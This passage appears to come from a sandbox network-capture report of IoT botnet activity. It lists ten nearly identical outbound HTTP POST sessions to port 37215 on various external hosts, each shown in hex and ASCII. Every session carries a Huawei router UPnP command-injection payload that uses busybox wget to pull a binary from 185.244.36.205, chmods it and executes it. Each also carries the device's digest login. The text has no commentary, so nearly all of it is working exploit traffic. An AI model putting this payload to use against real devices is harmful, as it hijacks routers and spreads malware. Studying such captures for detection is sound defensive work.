                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              93192.168.2.153729694.68.31.7737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034794092 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              94192.168.2.1544050121.252.244.19737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034804106 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              95192.168.2.1539130154.213.213.13737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034858942 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              96192.168.2.1533962156.82.80.137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034877062 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              97192.168.2.1554908190.17.85.25237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034907103 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              98192.168.2.153711237.100.211.13837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034910917 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              99192.168.2.1551246138.22.24.25137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034979105 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              100192.168.2.154760094.168.20.12837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035017014 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              101192.168.2.156054037.221.103.24937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035022020 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              102192.168.2.1542060138.205.161.21837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035070896 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
